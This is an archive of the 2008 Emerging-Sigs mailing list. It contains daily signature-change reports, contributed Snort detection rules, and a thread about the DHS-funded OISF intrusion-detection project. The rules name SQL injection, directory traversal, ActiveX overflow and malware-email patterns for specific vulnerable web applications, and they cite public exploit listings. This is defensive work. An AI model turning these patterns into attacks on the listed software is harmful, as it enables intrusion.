non-rule lines: [---] -> Removed from emerging-sid-msg.map (7): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category:OWASP_SQLiX_Project 2500062 || ET COMPROMISED Known Compromised or Hostile Host Traffic (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500063 || ET COMPROMISED Known Compromised or Hostile Host Traffic (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500064 || ET 
COMPROMISED Known Compromised or Hostile Host Traffic (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510062 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510063 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510064 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (7): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category:OWASP_SQLiX_Project 2500062 || ET COMPROMISED Known Compromised or Hostile Host Traffic (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500063 || ET COMPROMISED Known Compromised or Hostile Host Traffic (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500064 || ET COMPROMISED Known Compromised or Hostile Host Traffic (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510062 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510063 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510064 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Tue Oct 14 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Tue, 14 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081014200008.CB85345026@goliath.jonkmans.com> [***] Results from Oinkmaster started Tue Oct 14 16:00:08 2008 [***] [+++] Added rules: [+++] 2008661 - ET TROJAN Zbot/Zeus HTTP POST 
(emerging-virus.rules) 2008662 - ET TROJAN Generic PSW Agent server reply (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2008661 || ET TROJAN Zbot/Zeus HTTP POST 2008662 || ET TROJAN Generic PSW Agent server reply -> Added to emerging-sid-msg.map.txt (2): 2008661 || ET TROJAN Zbot/Zeus HTTP POST 2008662 || ET TROJAN Generic PSW Agent server reply -> Added to emerging-virus.rules (2): # ref: 5742862edc6fddd3f51bf9d07c8d7aba # ref: 940fc0b0d523be104a96b09871e42b1e [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From signatures at stillsecure.com Wed Oct 15 08:17:47 2008 From: signatures at stillsecure.com (signatures) Date: Wed, 15 Oct 2008 06:17:47 -0600 Subject: [Emerging-Sigs] StillSecure: 5 New Signatures - Oct-15-2008 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2908@webmail.latis.com> Hi Matt, Please find 5 New Signatures below: 1. My PHP Indexer d File Disclosure alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"My PHP Indexer d File Disclosure"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?d="; nocase; pcre:"/((\.\.\/){1,}|(%2e%2e%2f){1,})/"; classtype:web-application-attack;reference:url,secunia.com/Advisories/32215/; reference:url,www.milw0rm.com/exploits/6740; sid:8457; rev:1;) 2. 
Real Estates Classifieds cat SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Real Estates Classifieds cat SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?cat="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack;reference:url,secunia.com/Advisories/32223/; reference:url,www.milw0rm.com/exploits/6736; sid:8458; rev:1;)

3. Joomla Ignite Gallery Component gallery SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla Ignite Gallery Component gallery SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?option=com_ignitegallery&task=view"; nocase; uricontent:"&gallery="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32240/; reference:url,www.milw0rm.com/exploits/6723; sid:8459; rev:1;)

4. Joomla Mad4Joomla Mailforms Component jid SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla Mad4Joomla Mailforms Component jid SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?option=com_mad4joomla"; nocase; uricontent:"&jid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32239/; reference:url,www.milw0rm.com/exploits/6724; sid:8460; rev:1;)

5. IndexScript parent_id SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"IndexScript parent_id SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/sug_cat.php?parent_id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32173/; reference:url,www.milw0rm.com/exploits/6746; sid:8461; rev:1;)

Looking forward to your comments if any...

Thanks & Regards,
StillSecure
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081015/62d4f0d1/attachment.html From emerging at emergingthreats.net Wed Oct 15 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Wed, 15 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081015200008.59F7445026@goliath.jonkmans.com> [***] Results from Oinkmaster started Wed Oct 15 16:00:08 2008 [***] [+++] Added rules: [+++] 2008663 - ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) (emerging-malware.rules) 2008664 - ET TROJAN Generic Dropper HTTP Bot grabbing config (emerging-virus.rules) 2008665 - ET TROJAN Obfiscator.vc or Related Infection Checkin (emerging-virus.rules) 2008666 - ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) (emerging-virus.rules) [///] Modified active rules: [///] 2008640 - ET SCAN SIP erase_registrations/add registrations attempt (emerging-voip.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (4): 2008663 || ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) 2008664 || ET TROJAN Generic Dropper HTTP Bot grabbing config 2008665 || ET TROJAN Obfiscator.vc or Related Infection Checkin 2008666 || ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) -> Added to emerging-sid-msg.map.txt (4): 2008663 || ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) 2008664 || ET TROJAN Generic Dropper HTTP Bot grabbing config 2008665 || ET TROJAN Obfiscator.vc or Related Infection Checkin 2008666 || ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) -> Added to emerging-virus.rules (2): # ref: c2a3a87735f8c5e11de82c52c94aefc7 #re 7a60eada62a331c793ba066e43bfc4f2 From jonkman at jonkmans.com Thu Oct 16 10:40:12 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 16 Oct 2008 10:40:12 -0400 Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS Message-ID: 
<48F7524C.7040106@jonkmans.com>

October 16, 2008 (LAFAYETTE, Ind.) - The Open Information Security Foundation (OISF, www.openinfosecfoundation.org) is proud to announce its formation, made possible by a grant from the U.S. Department of Homeland Security (DHS). The OISF has been chartered and funded by DHS to build a next-generation intrusion detection and prevention engine. This project will consider every new and existing technology, concept and idea to build a completely open source licensed engine. Development will be funded by DHS, and the end product will be made available to any user or organization.

This is an unprecedented opportunity for the security community. DHS has recognized that many parallel technologies in the marketplace could greatly enhance the overall security of government agencies and the Internet as a whole. This grant will allow us to work as a community to tie these technologies together.

Over the next six months, members of OISF will be leading brainstorming sessions at key conferences and meetings as well as through mailing list discussions. These sessions will function as open forums to bring up ideas, ask questions and, most of all, let OISF know what YOU need for YOUR network. Any idea, any technology - anything - will be considered for integration. This project will solicit input, code and support from all interested parties, academic groups, vendors and projects.

Any vendor, group, academic institution, government agency or individual may be part of the consortium that will manage this project long-term. Members may support development and maintenance with financial donations, coding support, technology support, infrastructure, etc. Members will be rewarded with licensing that will allow integration of this engine into their products and services.
Initial project members are Matt Jonkman of Emerging Threats as Project Manager (http://www.emergingthreats.net), Victor Julien (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical Leads. If you have ideas to contribute please join our discussion mailing list: http://lists.openinfosecfoundation.org/mailman/listinfo/discussion or join oisf-announce to stay in touch: http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Thu Oct 16 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Thu, 16 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081016200008.87DE745026@goliath.jonkmans.com> [***] Results from Oinkmaster started Thu Oct 16 16:00:08 2008 [***] [*] Rules modifications: [*] None. 
[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (2):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Added to emerging-sid-msg.map.txt (2):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From jim.mcquaid at gmail.com Thu Oct 16 19:38:55 2008
From: jim.mcquaid at gmail.com (James McQuaid)
Date: Thu, 16 Oct 2008 19:38:55 -0400
Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS
Message-ID:

Congratulations Matt!

This is terrific news for everyone :)

James

> Message:
> Date: Thu, 16 Oct 2008 10:40:12 -0400
> From: Matt Jonkman
> Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS
> To: announce at emergingthreats.net
> Message-ID: <48F7524C.7040106 at jonkmans.com>
> Content-Type: text/plain; charset=windows-1252
>
> October 16, 2008 (LAFAYETTE, Ind.) - The Open Information Security Foundation (OISF, www.openinfosecfoundation.org) is proud to announce its formation, made possible by a grant from the U.S. Department of Homeland Security (DHS). The OISF has been chartered and funded by DHS to build a next-generation intrusion detection and prevention engine. This project will consider every new and existing technology, concept and idea to build a completely open source licensed engine. Development will be funded by DHS, and the end product will be made available to any user or organization.
>
> This is an unprecedented opportunity for the security community. DHS has recognized that many parallel technologies in the marketplace could greatly enhance the overall security of government agencies and the Internet as a whole. This grant will allow us to work as a community to tie these technologies together.
>
> Over the next six months, members of OISF will be leading brainstorming sessions at key conferences and meetings as well as through mailing list discussions. These sessions will function as open forums to bring up ideas, ask questions and, most of all, let OISF know what YOU need for YOUR network. Any idea, any technology - anything - will be considered for integration. This project will solicit input, code and support from all interested parties, academic groups, vendors and projects.
>
> Any vendor, group, academic institution, government agency or individual may be part of the consortium that will manage this project long-term. Members may support development and maintenance with financial donations, coding support, technology support, infrastructure, etc. Members will be rewarded with licensing that will allow integration of this engine into their products and services.
>
> Initial project members are Matt Jonkman of Emerging Threats as Project Manager (http://www.emergingthreats.net), Victor Julien (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical Leads.
>
> If you have ideas to contribute please join our discussion mailing list:
> http://lists.openinfosecfoundation.org/mailman/listinfo/discussion
>
> or join oisf-announce to stay in touch:
> http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce
>
> ------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> End of Emerging-sigs Digest, Vol 11, Issue 20
> *********************************************

--
James McQuaid
http://www.jamesmcquaid.com

From randy at procyonlabs.com Thu Oct 16 20:52:04 2008
From: randy at procyonlabs.com (Randal T. Rioux)
Date: Thu, 16 Oct 2008 20:52:04 -0400 (EDT)
Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS
Message-ID: <369a4e0cedd3f6da640430da11f2f93d.squirrel@meteor.procyonlabs.com>

I'd say congratulations if I wasn't so concerned. Why is this effort being started? Is there a problem with the current open source solution(s)?

What, specifically, would be different? DHS is known for pissing large quantities of taxpayer money away. I'd just like some justifications and specifics if possible.

Thanks,

A Cranky and Concerned Citizen

On Thu, October 16, 2008 10:40 am, Matt Jonkman wrote:
> October 16, 2008 (LAFAYETTE, Ind.) - The Open Information Security Foundation (OISF, www.openinfosecfoundation.org) is proud to announce its formation, made possible by a grant from the U.S. Department of Homeland Security (DHS). The OISF has been chartered and funded by DHS to build a next-generation intrusion detection and prevention engine.
> This project will consider every new and existing technology, concept and idea to build a completely open source licensed engine. Development will be funded by DHS, and the end product will be made available to any user or organization.
>
> This is an unprecedented opportunity for the security community. DHS has recognized that many parallel technologies in the marketplace could greatly enhance the overall security of government agencies and the Internet as a whole. This grant will allow us to work as a community to tie these technologies together.
>
> Over the next six months, members of OISF will be leading brainstorming sessions at key conferences and meetings as well as through mailing list discussions. These sessions will function as open forums to bring up ideas, ask questions and, most of all, let OISF know what YOU need for YOUR network. Any idea, any technology - anything - will be considered for integration. This project will solicit input, code and support from all interested parties, academic groups, vendors and projects.
>
> Any vendor, group, academic institution, government agency or individual may be part of the consortium that will manage this project long-term. Members may support development and maintenance with financial donations, coding support, technology support, infrastructure, etc. Members will be rewarded with licensing that will allow integration of this engine into their products and services.
>
> Initial project members are Matt Jonkman of Emerging Threats as Project Manager (http://www.emergingthreats.net), Victor Julien (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical Leads.
>
> If you have ideas to contribute please join our discussion mailing list:
> http://lists.openinfosecfoundation.org/mailman/listinfo/discussion
>
> or join oisf-announce to stay in touch:
> http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce

From jonkman at jonkmans.com Thu Oct 16 21:07:43 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 16 Oct 2008 21:07:43 -0400
Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS
In-Reply-To: <369a4e0cedd3f6da640430da11f2f93d.squirrel@meteor.procyonlabs.com>
References: <369a4e0cedd3f6da640430da11f2f93d.squirrel@meteor.procyonlabs.com>
Message-ID: <48F7E55F.6010504@jonkmans.com>

Randal T. Rioux wrote:
> I'd say congratulations if I wasn't so concerned. Why is this effort being started? Is there a problem with the current open source solution(s)?

No, this project isn't about fixing what exists. It's about the next step, and there's really no commercially viable way for any vendor to invest what's required and take this risk to make that next big step. There's money in making the existing go faster, but there's not an immediate market for doing this plus these other things.

> What, specifically, would be different? DHS is known for pissing large quantities of taxpayer money away. I'd just like some justifications and specifics if possible.

Reasonable question. I've just sent some of my ideas to the oisf discussion list. There's a discussion starting there so I'll skip the details here. Hop on that list if you're more interested, but I'll summarize here:

We have more data than we can use at the moment. I would like to see IP reputation support that can be shared amongst sensors. Snortsam on massive steroids. That'd let us take intelligence feeds from our peers as well as our security vendors. Many companies (and projects like ET) have huge warehouses of information about IPs, domains, malware, exe's etc. But we have no real way to use this data in realtime.
Multithreading is something we have to get better at. And hardware acceleration, we need to do that natively, and not just for one platform. There are many ways to accelerate, and many ways we can't accelerate because we can't rewrite. This project will take all possible into consideration at design time and hopefully support as many as feasible out of the box.

Last thing, scoring by hits. As SpamAssassin does to make a decision about an email, I'd like to be able to make that decision about an IP. If they do a bunch of things that are a little bad I want the ability to block them realtime, automated.

But anyway, if you want more info on what/how/why the OISF list will be best to get that discussion.

Your question is good, I've seen tons of wasted money on very bad things. I don't believe this is one of them. And we're not talking millions here. We're going to rely on donations, the community, and volunteers far more than our funding, but this is VERY doable.

Matt

> Thanks,
>
> A Cranky and Concerned Citizen
>
> On Thu, October 16, 2008 10:40 am, Matt Jonkman wrote:
>> October 16, 2008 (LAFAYETTE, Ind.) - The Open Information Security Foundation (OISF, www.openinfosecfoundation.org) is proud to announce its formation, made possible by a grant from the U.S. Department of Homeland Security (DHS). The OISF has been chartered and funded by DHS to build a next-generation intrusion detection and prevention engine. This project will consider every new and existing technology, concept and idea to build a completely open source licensed engine. Development will be funded by DHS, and the end product will be made available to any user or organization.
>>
>> This is an unprecedented opportunity for the security community. DHS has recognized that many parallel technologies in the marketplace could greatly enhance the overall security of government agencies and the Internet as a whole. This grant will allow us to work as a community to tie these technologies together.
>>
>> Over the next six months, members of OISF will be leading brainstorming sessions at key conferences and meetings as well as through mailing list discussions. These sessions will function as open forums to bring up ideas, ask questions and, most of all, let OISF know what YOU need for YOUR network. Any idea, any technology - anything - will be considered for integration. This project will solicit input, code and support from all interested parties, academic groups, vendors and projects.
>>
>> Any vendor, group, academic institution, government agency or individual may be part of the consortium that will manage this project long-term. Members may support development and maintenance with financial donations, coding support, technology support, infrastructure, etc. Members will be rewarded with licensing that will allow integration of this engine into their products and services.
>>
>> Initial project members are Matt Jonkman of Emerging Threats as Project Manager (http://www.emergingthreats.net), Victor Julien (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical Leads.
>>
>> If you have ideas to contribute please join our discussion mailing list:
>> http://lists.openinfosecfoundation.org/mailman/listinfo/discussion
>>
>> or join oisf-announce to stay in touch:
>> http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce

From jonkman at jonkmans.com Thu Oct 16 21:12:12 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 16 Oct 2008 21:12:12 -0400
Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS
In-Reply-To:
References:
Message-ID: <48F7E66C.4010608@jonkmans.com>

Thanks Jim, let's hope something good comes of it all!

Matt

James McQuaid wrote:
> Congratulations Matt!
>
> This is terrific news for everyone :)
>
> James
>
>> Message:
>> Date: Thu, 16 Oct 2008 10:40:12 -0400
>> From: Matt Jonkman
>> Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS
>> To: announce at emergingthreats.net
>> Message-ID: <48F7524C.7040106 at jonkmans.com>
>> Content-Type: text/plain; charset=windows-1252
>>
>> October 16, 2008 (LAFAYETTE, Ind.) - The Open Information Security Foundation (OISF, www.openinfosecfoundation.org) is proud to announce its formation, made possible by a grant from the U.S. Department of Homeland Security (DHS). The OISF has been chartered and funded by DHS to build a next-generation intrusion detection and prevention engine. This project will consider every new and existing technology, concept and idea to build a completely open source licensed engine. Development will be funded by DHS, and the end product will be made available to any user or organization.
>>
>> This is an unprecedented opportunity for the security community.
>> DHS has recognized that many parallel technologies in the marketplace could greatly enhance the overall security of government agencies and the Internet as a whole. This grant will allow us to work as a community to tie these technologies together.
>>
>> Over the next six months, members of OISF will be leading brainstorming sessions at key conferences and meetings as well as through mailing list discussions. These sessions will function as open forums to bring up ideas, ask questions and, most of all, let OISF know what YOU need for YOUR network. Any idea, any technology - anything - will be considered for integration. This project will solicit input, code and support from all interested parties, academic groups, vendors and projects.
>>
>> Any vendor, group, academic institution, government agency or individual may be part of the consortium that will manage this project long-term. Members may support development and maintenance with financial donations, coding support, technology support, infrastructure, etc. Members will be rewarded with licensing that will allow integration of this engine into their products and services.
>>
>> Initial project members are Matt Jonkman of Emerging Threats as Project Manager (http://www.emergingthreats.net), Victor Julien (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical Leads.
>>
>> If you have ideas to contribute please join our discussion mailing list:
>> http://lists.openinfosecfoundation.org/mailman/listinfo/discussion
>>
>> or join oisf-announce to stay in touch:
>> http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce

From chris.a.libby at gmail.com Fri Oct 17 09:03:54 2008
From: chris.a.libby at gmail.com (Chris Libby)
Date: Fri, 17 Oct 2008 09:03:54 -0400
Subject: [Emerging-Sigs] Empty destination IP in 2404020
Message-ID:

Looks like 2404020 has an empty DstIP:

alert ip $HOME_NET any -> [] any (msg:"ET DROP Known Bot C&C Server Traffic (group 21)"; threshold: type limit, track by_src, seconds 3600, count 1; classtype:trojan-activity; sid:2404020; rev:1320; reference:url,www.shadowserver.org;)

TIA - Chris

From jonkman at jonkmans.com Fri Oct 17 09:06:14 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 17 Oct 2008 09:06:14 -0400
Subject: [Emerging-Sigs] Empty destination IP in 2404020
In-Reply-To:
References:
Message-ID: <48F88DC6.5090706@jonkmans.com>

Fixed up!

Thanks

Chris Libby wrote:
> Looks like 2404020 has an empty DstIP:
>
> alert ip $HOME_NET any -> [] any (msg:"ET DROP Known Bot C&C Server Traffic (group 21)"; threshold: type limit, track by_src, seconds 3600, count 1; classtype:trojan-activity; sid:2404020; rev:1320; reference:url,www.shadowserver.org;)
>
> TIA - Chris

From veerendragg at secpod.com Fri Oct 17 09:40:08 2008
From: veerendragg at secpod.com (Veerendra GG)
Date: Fri, 17 Oct 2008 19:10:08 +0530
Subject: [Emerging-Sigs] Signatures on Malware E-mail and XSS Attacks
Message-ID: <48F895B8.1020706@secpod.com>

# 14/10/2008 Microsoft PicturePusher XSS
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Microsoft PicturePusher ActiveX Cross Site File Upload Attack"; content:"clsid"; nocase; content:"507813C3-0B26-47AD-A8C0-D483C7A21FA7"; nocase; pcre:"/http\://.*?[\w]{4,}=1/i"; nocase; pcre:"/(PostURL|AddSeperator|AddString|Post)/i"; nocase; reference:url,milw0rm.com/exploits/6699; classtype:web-application-attack; sid:9031; rev:1;)

# 16/10/2008 eCard Email Malware Attack
alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"eCard email malware attack - Trojan"; flow:established,to_server; content:"|0d 0a|Subject\: You have received an eCard"; nocase; content:"e-card.zip"; nocase; classtype:trojan-activity; reference:url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/; sid:9032; rev:1;)

--
regards,
Veerendra GG
www.secpod.com
From signatures at stillsecure.com Fri Oct 17 10:00:28 2008
From: signatures at stillsecure.com (signatures)
Date: Fri, 17 Oct 2008 08:00:28 -0600
Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com>

Hi Matt,

Please find 6 new signatures below:

1. myEvent viewevent.php SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"myEvent viewevent.php SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/viewevent.php?eventdate="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31773; reference:url,www.milw0rm.com/exploits/6760; sid:8462; rev:1;)

2. AstroSPACES profile.php SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"AstroSPACES profile.php SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/profile.php?"; nocase; uricontent:"id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31771; reference:url,www.milw0rm.com/exploits/6758; sid:8463; rev:1;)

3. SweetCMS page SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SweetCMS page SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"index.php?page="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32277/; reference:url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt; sid:8464; rev:1;)

4. Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow

alert tcp $EXTERNAL_NET any -> $HOME_NET any ( msg:"Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; content:"PlainTextPassword"; nocase; classtype:successful-user; reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; sid:8465; rev:1;)

5. Sports Clubs Web Panel p Parameter Local File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Sports Clubs Web Panel p Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/index.php?p="; nocase; pcre:"/(\.\.\/){1,}/"; classtype: web-application-attack; reference:url,www.frsirt.com/english/advisories/2008/2550; reference:url,www.milw0rm.com/exploits/6427; sid:8466; rev:1;)

6. My PHP Dating id parameter SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"My PHP Dating id parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/success_story.php?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype: web-application-attack; reference:url,secunia.com/advisories/32268; reference:url,www.milw0rm.com/exploits/6754; sid:8467; rev:1;)

Looking forward to your comments, if any, on this week's rules posted...

Thanks & Regards,
StillSecure

From jonkman at jonkmans.com Fri Oct 17 14:12:32 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 17 Oct 2008 14:12:32 -0400
Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com>
Message-ID: <48F8D590.7060806@jonkmans.com>

Very nice! Posting now. Many thanks to Stillsecure!!

Matt

signatures wrote:
> Hi Matt,
>
> Please find 6 new signatures below:
>
> 1. myEvent viewevent.php SQL Injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"myEvent viewevent.php SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/viewevent.php?eventdate="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31773; reference:url,www.milw0rm.com/exploits/6760; sid:8462; rev:1;)
>
> 2. AstroSPACES profile.php SQL Injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"AstroSPACES profile.php SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/profile.php?"; nocase; uricontent:"id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31771; reference:url,www.milw0rm.com/exploits/6758; sid:8463; rev:1;)
>
> 3. SweetCMS page SQL Injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SweetCMS page SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"index.php?page="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32277/; reference:url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt; sid:8464; rev:1;)
>
> 4.
> Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any ( msg:"Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; content:"PlainTextPassword"; nocase; classtype:successful-user; reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; sid:8465; rev:1;)
>
> 5. Sports Clubs Web Panel p Parameter Local File Inclusion
>
